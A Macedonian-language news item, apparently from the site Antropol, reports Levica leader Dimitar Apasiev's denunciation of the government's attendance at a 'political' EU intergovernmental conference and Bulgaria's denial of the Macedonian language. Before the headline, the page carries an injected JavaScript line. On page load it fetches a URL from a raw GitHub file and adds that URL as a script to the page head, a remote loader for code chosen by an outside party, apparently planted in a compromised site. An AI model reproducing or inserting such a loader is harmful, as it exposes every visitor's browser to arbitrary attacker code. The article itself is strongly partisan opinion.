;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Апасиев: За непостоечка конференција ги шитнаа народот, јазикот, историјата и културата - Антропол
АктуелноЕУЛокално

Апасиев: За непостоечка конференција ги шитнаа народот, јазикот, историјата и културата

Денес во Брисел Владина делегација предводена од премиерот Димитар Ковачевски присуствува на „првата“ Меѓувладина конференција меѓу Македонија и ЕУ.

За волја на вистината, ова не е официјална, туку согласно „францускиот предлог“ на ЕУ за бугаризација на Македонија е „Политичка меѓувладина конференција“, измислица која не постои во правото на ЕУ.

До сега, ниту една земја која преговарала со ЕУ за полноправно членство не била изложена на ваков срамен чин. Потсетуваме, согласно срамниот протокол прифатен од квислингшката власт, првата меѓувладина конференција ќе се случи по уставните измени, согласно кои бугарскиот народ ќе биде конститутивен дел на Македонија.

Вчера, од страна на бившата и актуелната министерка за надворешни работи на Бугарија уште еднаш беше негирано постоењето на македонскиот јазик. Едностраната декларација испратена од Бугарија до КОРЕПЕР-от, официјално го потврди ова.

Бројните лаги на Маричиќ, Османи и севкупната актуелна власт се целосно разобличени. Фактичката состојба дека не ги отвораме преговорите со ЕУ останува непроменета, а по овој повод уште еднаш жестоко реагираше лидерот на Левица Димитар Апасиев. Тој кратко напиша:

За една фотосесија на ко божемска “конференција” која не постои во европското право – го шитнаа и народот, и јазикот, и културата, и историјата и Републиката!? СДС не е партија. СДС е дијагноза.